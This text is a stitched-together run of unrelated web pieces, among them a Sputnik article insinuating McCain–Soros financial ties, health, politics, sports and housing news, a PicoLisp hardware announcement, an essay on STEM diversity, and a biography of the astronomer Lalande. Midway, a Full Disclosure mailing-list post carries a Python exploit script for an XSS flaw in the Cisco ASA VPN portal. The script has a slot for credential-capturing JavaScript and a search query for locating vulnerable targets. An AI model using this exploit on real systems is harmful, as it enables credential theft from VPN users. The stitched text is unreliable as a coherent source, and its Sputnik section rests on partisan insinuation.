He also poses the question whether individuals and firms working for the McCain Institute "have appropriately registered under FARA [The Foreign Agents Registration Act], or under US state laws/regulations that require such persons to register before soliciting 'contributions.'"
FARA requires agents representing the interests of foreign powers to disclose their relationship with the foreign government and information about related activities and finances.
"There is also talk that McCain/his staff remain close with the Qataris," he remarked.
John McCain's 'Foreign Adventures'
The rumor isn't surprising in light of John McCain's involvement in the Syrian crisis and his support to Saudi and Qatari-backed militants.
Important visit with brave fighters in #Syria who are risking their lives for freedom and need our help pic.twitter.com/tx4uX572ZP — John McCain (@SenJohnMcCain) May 28, 2013
​In 2015 the delegation of US senators led by John McCain met with Saudi and Qatari leaders during their regional tour aimed at dealing with issues related to training Syrian rebels.
In #KSA delegation met w/ #Syrian Opposition Coalition Pres Ahmed Jarba & commander of Saudi Train & Equip program pic.twitter.com/gIXn5MPgHn — John McCain (@SenJohnMcCain) January 18, 2015
On the other hand, McCain was spotted equally enthusiastically supporting the so-called Euromaidan Revolution in Ukraine which resulted in a coup d'etat in February 2014.
© Sputnik / Ilya Pitalev US Senators Chris Murphy and John McCain cheer up the supporters of Ukraine's European integration at Maidan square in Kiev, Ukraine, Dec 12, 2013
"John McCain has never recently seen an intervention he did not care to support," Ortel said, expressing doubts that these activities truly correspond to America's national interests: "The US record intervening abroad, particularly since 2000 (so bi-partisan) has done a lot more harm than good to geo-political balances, has cost trillions of dollars, and resulted in great bloodshed."
However, there is yet another reason why McCain and like-minded American politicians and financiers could be interested in instigating instability abroad: these are possible vested interests, according to the Wall Street analyst.
A glaring example of such a "trouble-maker" is George Soros, a Hungarian-American investor and business magnate who has a long record of profiting from currency crises and economic instability.
'McCain Lives in George Soros' Back Pocket'
"Most individuals are not investors and most investors are not familiar with how one can profit from instability and from declines in the values of securities," Ortel explained, adding that George Soros has a long career of profiting from adversity while covering himself "in the cloak of his 'charities.'"
"Soros and many others can 'short' government bonds of nations that descend into chaos and/or enter into financial contracts where, by paying a modest set of premiums, they stand to gain as values of underlying securities decline in value," the Wall Street analyst elaborated.
© AP Photo / Kevin Wolf Soros and Hydrocarbons: What's Really Behind the Rohingya Crisis in Myanmar
According to Ortel, the practice "actually should be encouraged to regulate governments using market forces but only if such transactions are regulated and free from insider knowledge."
It is no coincidence that Soros and McCain have been repeatedly spotted endorsing US regime change operations here and there: their cooperation goes back over a decade, according to Jerome Robert Corsi, an American author and political commentator, who highlights that McCain has been "funded" by Soros since 2001.
In his 2008 article Corsi opined that in 2001, McCain founded the Reform Institute, not-for-profit think tank based in Alexandria, VA, "as a vehicle to receive funding from George Soros' Open Society Institute and Teresa Heinz Kerry's Tides Foundation and several other prominent non-profit organizations."
However, in 2006 the senator was forced to "sever his formal ties with the Reform Institute" due to a controversial $200,000 contribution from Cablevision, which was viewed as a potential conflict of interest.
Corsi believes that McCain is still being financed by Soros: "McCain lives in Soros' back pocket," the political commentator told Sputnik.
For its part, The Daily Caller in June 2017 drew attention to the fact that George Soros is among the McCain Institute's donors.
"I am not accusing McCain of trading on advance knowledge of looming instability in a particular nation or region," Ortel told Sputnik, "But I imagine there is enormous temptation for speculators to cultivate politicians to try to learn about future government actions or policies that might adversely affect exiting conditions in a particular foreign nation."
The views expressed in this article are solely those of the author and do not necessarily reflect the official position of Sputnik.
Not a fan of prunes? You're not alone. In fact, women ages 25 to 54 react so negatively to the idea of prunes that the California Prune Board pressured the Food and Drug Administration to change their name to the more appealing “dried plums” (which they technically are), and it worked! Sales of this super-healthy purple fruit have grown.
It's not surprising that prunes fell out of favour considering their close association with relieving constipation. Prunes (or shall we call them dried plums?) have been sold as a popular digestive remedy for decades mainly because of these three components: fibre, sorbitol (a sugar alcohol that can loosen the stool) and a natural laxative compound called diphenyl isatin.
Beyond the benefits to your digestive tract, and the fact that they offer a sweet hit for only 30 calories, plums and prunes have many other wonderful health properties. Here are just a few:
Subscribe To Our Newsletters — And Kick Your Health Into High Gear
They protect against cardiovascular diseases and other chronic illnesses
Prunes and plums contain high levels of phytonutrients called phenols. They're particularly high in two unique phytonutrients called neochlorogenic and chlorogenic acid. Numerous studies show that these phytonutrients help to prevent damage to cells particularly when it comes to the oxidation of lipid molecules in the body. Since all of our cell membranes, as well as our brain cells, are largely made up of lipids which contain fat, these are important phytonutrients to have in the diet. These compounds have also been found to inhibit the oxidation of LDL cholesterol in the body, making them an important factor in the prevention of chronic diseases.
They help prevent type 2 diabetes and obesity
Prunes and plums are high in soluble fibre that helps to keep blood sugar levels stable. Soluble fibre slows the rate that food leaves the stomach and, as a result, delays the absorption of sugar into the blood stream. Soluble fibre also increases the body's sensitivity to insulin.
The soluble fibre in prunes helps you feel satisfied after a meal, which can prevent overeating and subsequent weight gain.
Prunes and plums help to lower cholesterol
The soluble fibre we just spoke of also helps to lower cholesterol by soaking up excess bile in the intestine and then excreting it. Bile is made from cholesterol in the liver in order to digest fat. When the body excretes bile along with the fibre from prunes and plums, the liver must use cholesterol in the body to make more bile thereby lowering the amount in circulation in the body. Soluble fibre may also inhibit the amount of cholesterol manufactured by the liver in the first place. A 2011 study found that prunes are more effective than psyllium at relieving constipation.
They help improve bone health and reduce the risk of osteoporosis
A study from 2011 showed that prunes and plums are the most effective fruit in preventing and reversing bone loss due to rich sources of phenolic and flavonoid compounds.
They're a good source of vitamin K and beta carotene
A 2013 study showed that an increased intake in beta carotene can actually make people happier. Beta-carotene also protects and fixes the damage of free radicals on our cells, meaning it can help reverse the signs of aging. Vitamin K works in conjunction with beta carotene to fight the signs of aging by helping reduce bone loss and improving circulation.
How to make a green goddess smoothie bowl
Article originally published June 2012; Updated September 2018.
Soon, it will no longer be illegal to collect and re-use rain water in Colorado.
After dying on the House floor last year, the rain barrel bill is now on its way to being signed into law.
"Today is really exciting because it shows that our water laws and systems can be respected and still be adapted and flexible to add new tools and respond to a changing environment," said Theresa Conley, a water advocate with Conservation Colorado, a big supporter of the bill.
HB16-1105 was passed Friday morning by a majority of legislators on the Senate floor. The bill must be signed by Governor Hickenlooper before it takes effect on August 10.
Under the law, Colorado residents will be allowed to own up to two, 55-gallon rain barrels.
State Senator Jerry Sonnenberg, one of four lawmakers who opposed the bill on Friday, said the "saving grace" of this bill is a reporting requirement after 3 years, that would ensure that experts are studying the impact of rain barrel water usage.
Colorado's rain-barrel ban is little known and widely flouted. But the barrels violate Colorado water law, which says that people can use but not keep water that runs on or through their property.
"That's hard for people to understand when the state owns all the water and is charged in the constitution to distribute that water," Sen. Sonnenberg said.
Copyright 2016 KUSA
“Blimpo the Clown, a national treasure, has passed away due to a mysterious illness while overseas in Romania (wonder what could have done the ol' jester in). His body is shipped back to the U.S. and dropped off at a Baltimore newspaper building, where a “deal” is struck to watch the body overnight, before it's safely transported to the funeral home in the morning. Sounds like a simple task, doesn't it? Well, you haven't seen the security responsible for the safety of this particular building – an ex-soldier, his disgruntled co-officer and an Italian hothead with a cold stare – added to which is the newest employee on his first overnight shift. He's briefed on the duties, such as “watch this camera, play some cards.” It's not long, though, before ol' Blimpo hops up out of his wooden casket and takes on his new fang-tastic lifestyle, dispatching workers in the building and turning them into stark-raving bloodsuckers, and it's up to our bumbling squad of rent-a-cops to try to save the day!”
A vampire clown versus idiot rent-a-cops? Uh. Yes please. This gory horror comedy was written by Dan DeLuca, Jamie Nash, and directed by Mitchell Altieri, and screens at Fantasia on August 2. That it's already sold out is even more promising.
Full Disclosure mailing list archives
Cisco ASA VPN - Zero-Day Exploit
# Exploit author: Juan Sacco - jsacco () exploitpack com # Affected program: Cisco ASA VPN Portal - Zero Day # Cisco ASA VPN is prone to a XSS on the password recovery page. # This vulnerability can be used by an attacker to capture other user's credentials. # The password recovery form fails to filter properly the hidden inputs fields. # # This Zero-Day exploit has been developed and discovered by Juan Sacco. # Exploit Pack - Team http://exploitpack.com # # Release Dates: # Reported to Cisco PSIRT Feb 4/2016 # Cisco Dev Team working on a fix Feb 15/2016 # Cisco PSIRT report a CVE Feb 15/2016 # Exploit Pack disclose the bug Feb 15/2016 # Disclosure of the Exploit Feb 16/2016 # # Look for vulnerable targets here: https://www.google.nl/#safe=off&q=+%2F%2BCSCOE%2B%2F # More than 18.000 results in Google only import string, sys import socket, httplib import telnetlib def run(): try: Target = sys.argv[1] Port = int(sys.argv[2]) # Here goes your custom JS agent code Payload = "alert(1)" VulnerableURL = "/+CSCOE+/logon.html?reason=2&a0=63&a1=&a2=&a3=0&next=&auth_handle=&status=0&username=juansacco%22%20accesskey%3dX%20onclick%3d" + Payload + "%20sacco&password_min=0&state=&tgroup=&serverType=0&password_" CraftedRequest = VulnerableURL # Start the connection connection = httplib.HTTPSConnection(Target) connection.request('GET', CraftedRequest) Response = connection.getresponse() print "Server status response:", Response.status, Response.reason data = Response.read() vulnerable = "Target is not vulnerable" for line in str(data).splitlines(): if "juansacco\\\"" in line: vulnerable = "Targer is vulnerable" if vulnerable != "Not vulnerable": print "Result of the test:", vulnerable # Find the injection on the response connection.close() except Exception,e: print "Exploit connection closed " + str(e) if __name__ == '__main__': print "Cisco VPN ASA Exploit - Zero Day" print "################################" print "Author: Juan Sacco - jsacco () exploitpack com" try: Target = sys.argv[1] Port = sys.argv[2] except IndexError: pass run() _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
By Date By Thread
Current thread:
Hello List, we are proud to announce PilMCU, the Lisp Machine on a Chip! :)
We, that is George Orais (who persuaded me into the project) and me. Georg built the actual machine in Verilog, and I did the changes and extensions to PicoLisp. PilMCU is an implementation of 64-bit PicoLisp directly in hardware. A truly minimalistic system. PicoLisp is both the machine language and the operating system: * Memory management is trivial, just the Lisp heap and the stack * The built-in database is extended to hold a "file system" * One SSD per database file for mass storage * "Processes" run as tasks and coroutines * Events (timing and interrupts) via a 'wait' instruction * Complex I/O protocols are delegated to peripheral chips The final hardware can be very lightweight. Low transistor count and power consumption. No overhead for an OS. It is conceivable for a later stage to put many interconnected CPUs on a single chip. At present, we have it running in the Verilog simulator, and in an emulator (adaption of the PicoLisp 'emu' architecture). How shall we proceed? We need investors (or crowdfunding) to polish, manufacture and distribute the real thing. We imagine something in the line of an "Embedded Lisp Machine" or a "Lisp Machine Kit". Perhaps for home brewing, educational institutions and/or robotics research? Is anybody interested -- or knows people who are? For the fun of it, here is a sample session: $ make mcu && vvp -M. -mtty mcu # Build and start Verilog engine : $ make emu && ./emu ssd@ ssdA # Or: Build and start the emulator : Now we are in an environment equivalent to the standard 'pil +'. The database is open on two image files for two SSD drives. Besides the normal, full DB functionality : (show *DB) {1} (7 . {17}) T ({2} {20} {56} {64} {105} {146}) -> {1} you can call 'in', 'out', 'load' and 'rm' on files which are maintained in external symbols: : (dir) -> ("lib.l" "lib/") : (dir "lib") -> ("btree.l" "db.l" "dbg.l" "misc.l" "pilog.l" "sq.l") : (in "lib/db.l" (read)) -> (de dbs Lst (default *Dbs (_dbs 1))) : (out "foo/bar/mumble.l" (prinl "Hello world")) -> "Hello world" : (in "foo/bar/mumble.l" (line)) -> ("H" "e" "l" "l" "o" " " "w" "o" "r" "l" "d") : (dir "foo/bar") -> ("mumble.l") : (cd "foo/bar") -> "foo/bar/" : (dir) -> ("mumble.l") : (pwd) -> "foo/bar/" Path names are stored as a normal B-Tree in the DB root: : (scan) "foo/bar/mumble.l" {172} "lib.l" {2} "lib/btree.l" {64} "lib/db.l" {105} "lib/dbg.l" {20} "lib/misc.l" {56} "lib/pilog.l" {146} "lib/sq.l" {166} They point to external symbols, like {2} for "lib.l". (load '{2}) is equivalent to (load "lib.l") The values of these symbols hold the file size: : (show '{2}) {2} 12401 -> {2} They should not have properties, and store the raw file data invisibly in dynamically maintained DB blocks. The rest of the system is standard PicoLisp :) ♪♫ Alex -- UNSUBSCRIBE: mailto:picolisp@software-lab.de?subject=Unsubscribe
Turkish President Erdoğan announced that the EU must accept Turkey as a member to prove that they are not an Islamophobic "Christian club."
MOSCOW, January 24 (Sputnik) — Turkish President Recep Tayyip Erdoğan announced that if the European Union (EU) is opposed to Islamophobia, it must accept Turkey within its ranks, the Hurriyet Daily News reports.
At a press conference during his visit to Djibouti, the Turkish President gave a speech on his opposition to terrorism and mass deaths of Muslims in regional conflicts and civil wars. He announced that Turkey will never tolerate terrorists, who may represent different religions. After this, he sharply changed his rhetoric, focusing on the relations between Turkey and the European Union, according to the publication.
© East News / Ahmad Massoud Turkish President Berates French Charlie Hebdo Magazine for Inciting Hatred
"We are testing Europe. Will Europe be able to digest and to accept Turkey, whose people are Muslims? If you oppose Islamophobia, then you must admit Turkey into the EU," he declared, saying that otherwise the EU is a "Christian club," according to Turkish news website Today's Zaman.
"Turkey is included in NATO, OECD… And why don't you admit it into the EU? Then, the problem is elsewhere," Erdoğan said. "Turkey is a strong country now and it will not come to the EU's door to beg [for membership]."
President Erdoğan also underscored that if Turkey is not allowed to join the EU, it will follow a different path.
F1's new CEO Chase Carey has responded to comments by his predecessor Bernie Ecclestone at the weekend in Bahrain that F1 race promoters had been overcharged and will now want a discount or to withdraw from their contracts, as well as his assertion that Liberty is not focussed on profits, where he had to be to satisfy his shareholders, CVC Capital Partners.
The American told the Financial Times on Monday that Ecclestone "managed for short-term profits, we are managing for long term value", while he said that race promoters "were not tricked" on price, but the problem was "has F1 invested in the right way to support the events?"
Ecclestone was deposed by Liberty Media once they completed the takeover of the sport in January. He was made chairman emeritus. They installed Carey and his management team and they have since renewed circuit deals with Russia and Canada, while the Singapore promoters were in Melbourne to discuss a contract extension. However Malaysia has announced that this year's race will be the last.
What Ecclestone said
Ecclestone was in Bahrain as a guest of the Bahraini Crown Prince and went on the grid on Sunday. On Friday he met with reporters at the track and said,
"The only thing that would be good for everyone would be if we could charge the promoters a lot less money. I charged them too much for what we provide.
"I did some good deals commercially. They are paying a lot of money, and most of them, if not all of them, are not making any money. Quite the opposite.
"Sooner or later I'm frightened that the governments behind them will say enough is enough, and bye-bye.
"If we could reduce the fee they pay they could then charge less for tickets and sell more tickets.
He also suggested that Liberty Media and the new management were not worried about managing the F1 business for profit, as they are spending money he did not on new areas like commercial research, marketing and digital media.
“I was running the company to try and make money for the shareholders. It doesn't seem that's the thing that's driving them. He (Carey) wants to get more happy spectators I think," said Ecclestone.
“It's not for a few years when people start thinking you haven't done what you thought you would have. I wouldn't want to be having to deliver to a public company today. I feel sorry for Chase having to do that.”
What Carey said
Carey was reluctant to get into a tit-for-tat with Ecclestone, however on these points he responded to the Financial Times on Monday,
“These were agreements negotiated between two capable parties and if there is a definition of fair value it's a deal that two capable parties agree on," he said "These were agreements between two parties that valued the franchise how it was valued. Nobody was tricked.
“If there is a point to it; has F1 invested in the right way to support the events? It's not that the deal is overpriced, it's more did we deliver where we should deliver?
“So when Bernie says we are not managing for profits, what he is meaning is: we are investing in marketing, investing in digital.
“He managed for short-term profits, we are managing for long term value.
“Many times to build value you will invest money at an early stage to increase value at a later stage.
“If you look at sports that have had incredible growth, like the English Premier League or the NFL, they have made investments to grow their franchise. We are committed to growing value, but we do believe it's important to invest in the sport. We do care about the profits, but realistically the long-term value is what it's all about,
“Therefore some of the things that should have been done to support the events; marketing the sport better, creating access to digital platforms to bring in new fans, to provide research to understand how do you make it better, those sorts of tools didn't exist.
“The (Ecclestone) comment on profits is very telling; is it about short term profits? No. We've been very clear; we think it's about building long term value.
"Investing money does not mean we don't care about profits”
THE Green Party in Limerick says plans for the pedestrianisation of O'Connell Street are “not ambitious enough”.
Limerick City and County Council put on display plans for the transformation of the city's main thoroughfare, with the project to cost in the region of €10m.
It is anticipated cars will be banned from the main thoroughfare between the junction with Roches Street down to the junction with William Street. The overall project will start from the Denmark Street junction
But the Green Party's general election candidate James Gaffney is disappointed the local authority did not take into account his party's submission for a linear park running alongside O'Connell Street between the junction with Mallow Street and William Street.
He said the park would “highlight the proud history of Limerick as well as underscore the bright future for the city”.
“Consideration could be given to naming the park after one of our great sporting heroes such as Anthony Foley, Pat Hartigan, Paul O'Connell or Andy Lee,” he said.
To tackle the parking issues which may arise, Mr Gaffney said Roches Street, Cecil Street and Glentworth Street could be reduced to one-way systems to allow diagonal parking.
“The existing restaurants and cafés along the street would be given the option of providing significant outdoor seating for their customers to attract people to spend time in the city centre in an environment where they can relax, enjoy a meal without sitting on a street with traffic passing,” he said.
“This proposal is a vision for a city where people will come and spend time in the city centre in preference to the out of town retail outlets which have devastated the city centre. We in the Limerick Green Party are committed to making the city centre in an ever more vibrant and pleasant place where people will want to live, work and spend their free time. This plan is very much a cornerstone of that vision for Limerick,” Mr Gaffney concluded.
WASHINGTON (MarketWatch) - Boosted by an 82% increase in construction of apartment buildings, U.S. housing starts surged 22% in February to a seasonally adjusted annual rate of 583,000, the Commerce Department estimated Tuesday.
It was the largest percentage gain in 19 years and was the first increase in eight months in the sector that was at ground zero in the global economic recession. The housing data in winter months are especially volatile because of the weather.
Building permits, which are less volatile than the starts data, rose 3% in February to a 547,000 annual rate. Permits for single-family units rose 11% to a 373,000 rate, the largest percentage gain in 18 years.
"We're inclined to write this off as a weather-related fluke for now," wrote economists for Wrightson ICAP. "If the permits series can hold onto its gains in next month's March report, though, we'll take it as a sign that new construction has finally found a floor (albeit a very low one)."
"We hold to the view that the level of housing construction is becoming so low in absolute terms that starts will bottom out in the months ahead," wrote John Ryding and Conrad DeQuadros of RDQ Economics.
Construction of new housing units had plunged 38% in the previous three months before February's unexpected jump. Economists surveyed by MarketWatch had forecast a further drop to 456,000, despite an expected surge in multifamily construction.
But despite February's gain, housing starts are down 47% from a year ago, and are down 74% from the peak in early 2006. Permits are down 44% in the past year.
Builders are trying to reduce their inventories of unsold homes as they face relentless competition from older homes thrown on the market by foreclosures or short-sales.
"With new home sales still falling and the months' supply at a record there is no reason for homebuilding to rise," wrote Ian Shepherdson, chief U.S. economist for High Frequency Economics.
The mood of home builders' has rarely been worse. The National Association of Home Builders reported Monday that its sentiment index was stuck at 9 on a scale of 1 to 100 in March. See full story.
The government cautions that its monthly housing data are volatile and subject to large sampling and other statistical errors. In most months, the government can't be sure whether starts increased or decreased. In February for instance, the standard error for starts was plus or minus 13.8%. Large revisions are common.
It can take four months for a new trend in housing starts to emerge from the data. In the past four months, housing starts have averaged 568,000 annualized, down from 614,000 in the four months ending in January.
Details
February's housing start rate of 583,000 was the highest since November. January's starts were revised higher to a 477,000 pace, a record low dating back to the 1940s.
Completions of housing units rose 2.3% to a seasonally adjusted annual rate of 785,000. Completions of single-family homes fell 8.2% to a record-low 505,000.
The number of units under construction fell 2.7% to a 762,000 annual rate. Single-family homes under construction dropped 3.4% to 370,000, the lowest in 38 years.
Starts rose 89% in the Northeast, rose 58% in the Midwest, rose 30% in the South and fell 25% in the West.
Neocon accused of misquoting Iran's leader to push case for invasion Nick Juliano
Published: Monday November 19, 2007
del.icio.us
Print This Email This One of the countrys most prominent neoconservative pundits has been accused of using a fabricated quote from Irans supreme religious leader in pushing his argument that a US invasion is the only recourse to deter that countrys nuclear ambitions. Norman Podhoretz is among the most vocal in urging President Bush to bomb Iran, and he has predicted the president will launch an attack before his term is up. Podhoretzs argument is based on his belief that a nuclear-armed Iran would not be deterred from launching its missiles because its leaders do not fear their countrys destruction. The Economist has called into question an oft-cited statement Podhoretz attributes to Iranian leader Ayatollah Khomeini, saying it is likely bogus. Podhoretz, a prominent adviser to Republican candidate Rudy Giuliani, is unbowed in his push for war, and he says he accurately quoted Khomeini saying the following: We do not worship Iran, we worship Allah. For patriotism is another name for paganism. I say let this land [Iran] burn. I say let this land go up in smoke, provided Islam emerges triumphant in the rest of the world. The Economist quotes Shaul Bakhash, a Middle East scholar at George Mason University, who thoroughly researched the alleged quotation, which was first cited by Iranian journalist Amir Taheri. Bakhash could find no evidence that those words ever crossed the Ayatollahs lips. This research, I think, clearly establishes that the alleged quotation is a fabrication, Bakhash writes in a private newsletter for Gulf experts. The scholar searched the Library of Congress, a database of Farsi-language holdings at libraries worldwide, books published in Iran and a presumably comprehensive database of Khomeinis statements, speeches, fatwas, etc. and could not find the quotation Podhoretz and other Iran hawks are so fond of. Andrew Sullivan, blogging at The Atlantic, jumps at the chance to undercut Podhoretzs apparent misquotation. One should not expect intellectual honesty from Norman Podhoretz. So I have no hope he will respond to this post at the Economist, Sullivan writes. Podhoretz shoots back, accusing Sullivan of shrill hysteria and relying on his original source to back up the quotes validity. Taheri tells Podhoretz that the quote appeared in Paymaha va Sokhanraniyha-yi Imam Khomeini (Messages and Speeches of Imam Khomeini) published by Nur Research and Publication Institute (Tehran, 1981). The quote, along with many other passages, disappeared from several subsequent editions as the Islamic Republic tried to mobilize nationalistic feelings against Iraq, which had invaded Iran in 1980, Taheri writes. The practice of editing and even censoring Khomeini to suit the circumstances is widely known by Iranian scholars. To Podhoretz, this is all the proof he needs that the Khomeini quote is accurate; he further pushes back against claims from the Economist that another quote from former Iranian President Rafsanjani is inaccurate. But even the quotes are inaccurate the case for war against Iran remains, he argues. Since the case I make rests on much more than the two quotations from Khomeini and Rafsanjani, he says, it would still stand even if those quotations were in fact bogus or fabricated.
Wayne Rogers, the actor best known for his portrayal of U.S. Army Capt. “Trapper” John McIntyre on the TV series “M*A*S*H,” has died, the Associated Press reported Thursday. He was 82.
Rogers' death was the result of complications from pneumonia, his representative Rona Menashe told the AP.
The actor also appeared in the television shows “Murder, She Wrote,” “Stagecoach West” and “City of Angels,” and in the film “Cool Hand Luke,” according to IMDB.com.
He is survived by his wife, Amy; his children Bill and Laura from his first marriage to actress Mitzi McWhorter; and four grandchildren: Alexander, Daniel, William and Anais, ETOnline reported.
Correction: An earlier version of this article incorrectly reported that Rogers appeared in the TV series “Trapper John, M.D.” The post has been updated.
Last week, Janaye Ingram, the Washington DC Bureau Chief of the National Action Network, wrote an impassioned article about the lack of diversity in science and technology careers, (We Need More Black Faces in Science and Technology Fields, The Loop 21, May 25, 2012). The impetus, this Best Buy Commercial:
Not a single woman. Not a single person of color. I read the rest of her article and I nodded in agreement with each sentence. (Read her piece, it is a must). I can totally relate to everything she is saying and where she is coming from. We do need to see more Black Faces representing the opportunities and successes possible in the science and technology. (Make me wish had a special African-American version #IamScience Story Collider to email to her right now). Though, I often complain about the numbers of African-American (and Latin and Native American) scientists and engineers there are, I have this to offer to Ms. Ingram. There are more of us than you may know. Students, inventors, professors and educators from a number and variety of STEM disciplines that could spin your head are at the helm and ready to be role models and community leader. Right now. The reality is that science doesn't command much media coverage and in special affinity media outlets, science is pretty much non-existent. Instead, young people get a lot of this:
An immediate remedy would be for The Loop 21 and other Black media outlets that claim to have commitments to sharing news and opportunities with the community to step their games up. Include more science and tech news and highlight African-American scientists, inventors, and engineers. Feature more positive news stories of the Influencers, the achievers and Movers and Shakers in Education, Science and Technology. Each year, The Root lists the Top 100 - 100 Most Influential African-Americans of the year. Ebony Magazine publishes a similar list, too. And guess what groups of people rarely make this list: Scientists and Engineers. I agree that our students should know names of amazing role models like Mae Jemison and March Hannah, but who is going to tell them about these amazing people? Where will they read about these role models or learn about all of the these exciting career opportunities in STEM? In media outlets like these. This is low-hanging fruit.
Which brings me to a point I make often: Black Media has an amazing opportunity (and responsibility) to serve its readers by providing more in-depth science news coverage, (1, 2). So much of what becomes our subjects of our conversations begin with what we read or heard on the radio. It's time the conversation to change, to mature. It's past time for the Black community to have very serious conversations about science which includes access to quality education so that young people can pursue these 21st century career opportunities.
I agree, education and economic opportunities are at the heart of this disparity. I support the work that the organizations like the National Action Network and the National Urban League are doing to address these issues, but these issues are complicated. It will not be resolved by simply signing new legislation or hosting forums. In November 2011, I spoke before Executive Committee of the St. Louis, Missouri NAACP chapter. As members of a local Biotech Diversity roundtable that aims to increase the number of African-Americans participating in the growing biotech industry in the region, they asked me one question. How do we increase the number of African-Americans entering science?
The short answer: We raise the profile of education and science in the African-American community and deliberately offer the resources that students need to be successful in science.
That takes time, and the how you tackle this problem depends on when you would like to see measurable results: in 5 years, 10 years or 25 years? I cannot refute the studies that say that interacting with students at younger and younger ages is the key to engaging students in STEM, but that also mean we don't get to see those Black Faces in Science Technology for at least a generation. That's a long time to wait.
I would like to see some immediate results, which would mean an increase in the number of students attaining degrees in STEM and accessing good-paying career opportunities before retire. That would mean focusing our community attention and resources for students who are high school seniors and presently enrolled in college. It means not addressing the problem of inadequate preparation at the system level. It means taking a tough stance and working with only those who possess the grit and tenacity to work their asses off in an overwhelmingly unfair system. It means possibly passing over some really passionate and bright kids who don't have the grades. (This last one really bothers me the most, because these are these students I really enjoy working with.) It means being hard and fast to get some impressive results. I told you it's complicated.
Right now, students do a whole lot of juggling in the dark - manage your time, take care of other relatives, work after school and in the summer, figure out how study, secure financial aid, etc. If we, the Black Community, are really serious about creating a formidable and sizable STEM workforce, then we need to put our money and energy where our mouths are. We've got to create an environment that allows students to put their full attention to doing well in school. It means organizations and individuals providing the financial aid, supplemental education, mentoring, as well as emotional/psychological support to these students so that they can focus on their studies - and nothing else.
That's a tall order I know. However, I believe it is possible and it starts with families (immediate and extended). When communities create an environment of support for learning and study, students benefit. Here are my list of recommendations I made to the St. Louis NAACP Executive Committee.
1. Provide parents with the resources they need to feel comfortable discussing science and technology. No adult likes to feel as if he/she cannot have a reasonable conversation about current topics with his/her child. I think social service and civil justice organizations like the NAACP and the National Urban League are ideal for providing these resources to parents, grandparents and other adult influencers.
Parents set the tone and general path to achievement. In my many years of mentoring and working with young people, it's parents/guardians who more than anyone else who really set the bar of expectations for students. Other adults can help and are definitely beneficial, but it's parents who say to children I think a certain life is what I have in mind for you or what I will/not tolerate in your behavior that sets up what opportunities a child is able to take advantage of. Community organizations and church communities are great resources, providing a safe place for adults to speak with each other about parenting and opportunities for their teens. These organizations can foster important conversations such as:
Defining what success means to me
Developing an outline of success
Setting explicit expectations for my child
2. Re-prioritize education for children. Students whose parents/adult influencers who are unequivocal in their dedication to their children's' education - which includes comprehension, not just grades and good conduct and extra-curricular intellectual interests tend to be more driven, ambitious, and excel. This has to be more than words. For some families, this may be very difficult. Some students need to work or take care of other siblings/relatives in order for the household to stay afloat. This is why and where community support comes to play. When other adults, say extended family members - especially those without children or those who are better off financially - can really make a difference. Offering rides to after-school programs, helping to pay for summer camps or freeing up the young person's time so that they can fully participate in educational opportunities can be make big difference. This creates an implicit understanding in children that the adults in their lives are working to achieve certain objectives through daily/seasonal activities.
3. Redefining SUPPORT. The most important myth I think needs dispelling is this one: Tutoring is only for remedial learners. Students really need to get into the habit of locating supplemental education resources. They need to know how to find and create a community of support and assistance in their educational pursuits. Study buddies and study groups for all subjects should be identified immediately. Don't wait until you think you're doing poorly to get extra help in a subject. After-school clubs, summer programs, and academic competitions are also good places for support - academically and intellectually. Plus, let's not forget the importance of mentors. This strategy is about deliberately aligning yourself and your children with people/programs/resources that connect them to other high achievers. I know that participating in such programs can be financially and socially interruptive, especially for kids from single-parent or economically strapped families. I know from first-hand experience, but trust me that these opportunities yield big payoffs, particularly when it comes to post-secondary opportunities like access to scholarships, internships via networking, better grades and letters of recommendations.
In summary, access to science and technology careers will require a higher education. And success in higher education means understanding the culture of academia and high achievement. It's time to abandon the notions that some subjects are just not for some students or that they will ‘figure it out eventually'. It's also time to dispense the idea of luck or pre-destiny as the reasons why some make it and most don't. I'm tired of gambling away the future of bright and promising students. Success is a deliberate strategy not a lottery.
Joseph Jérôme Lefrançois de Lalande ( French: [lalɑ̃d]; 11 July 1732 – 4 April 1807) was a French astronomer, freemason and writer.
Biography [ edit ]
Lalande was born at Bourg-en-Bresse (now in the département of Ain) to Pierre Lefrançois and Marie‐Anne‐Gabrielle Monchinet. His parents sent him to Paris to study law, but as a result of lodging in the Hôtel Cluny, where Delisle had his observatory, he was drawn to astronomy, and became the zealous and favoured pupil of both Delisle and Pierre Charles Le Monnier. Having completed his legal studies, he was about to return to Bourg to practise as an advocate, when Lemonnier obtained permission to send him to Berlin, to make observations on the lunar parallax in concert with those of Lacaille at the Cape of Good Hope.
Quarter of a circle by Jonathan Sisson used by Jérôme de Lalande to measure the distance between the earth and the moon in 1751.
The successful execution of this task obtained for him, before he was twenty-one, admission to the Academy of Berlin, as well as his election as an adjunct astronomer to the French Academy of Sciences. He now devoted himself to the improvement of the planetary theory, publishing in 1759 corrected edition of Edmond Halley's tables, with a history of Halley's Comet whose return in that year he had helped Alexis Clairaut and Nicole-Reine Lepaute to calculate.[3] In 1762 Delisle resigned the chair of astronomy in the Collège de France in Lalande's favour. The duties were discharged by Lalande for forty-six years. His house became an astronomical seminary, and amongst his pupils were Delambre, Giuseppe Piazzi, Pierre Méchain, and his own nephew Michel Lalande. By his publications in connection with the transit of Venus of 1769 he won great fame. However, his difficult personality lost him some popularity.
In 1766, Lalande, with Helvetius, founded the "Les Sciences" lodge in Paris, and received its recognition from Grand Orient de France in 1772.[4] In 1776, he changed its name to Les Neuf Soeurs, and arranged for Benjamin Franklin to be chosen as the first worshipful master.[5]
Although his investigations were conducted with diligence rather than genius, Lalande's career was an eminent one. As a lecturer and writer he helped popularise astronomy. His planetary tables, into which he introduced corrections for mutual perturbations, were the best available up to the end of the 18th century. In 1801, he endowed the Lalande Prize, administered by the French Academy of Sciences, for advances in astronomy. Pierre-Antoine Véron, the young astronomer who for the first time in history determined the size of the Pacific Ocean from east to west, was Lalande's disciple.
Lalande was an atheist, and wrote a dictionary of atheists with supplements that appeared in print posthumously.
He never married but he had an illegitimate daughter Marie-Jeanne de Lalande whom he trained in mathematics so that she could help him with his work.[8]
Near discovery of Neptune [ edit ]
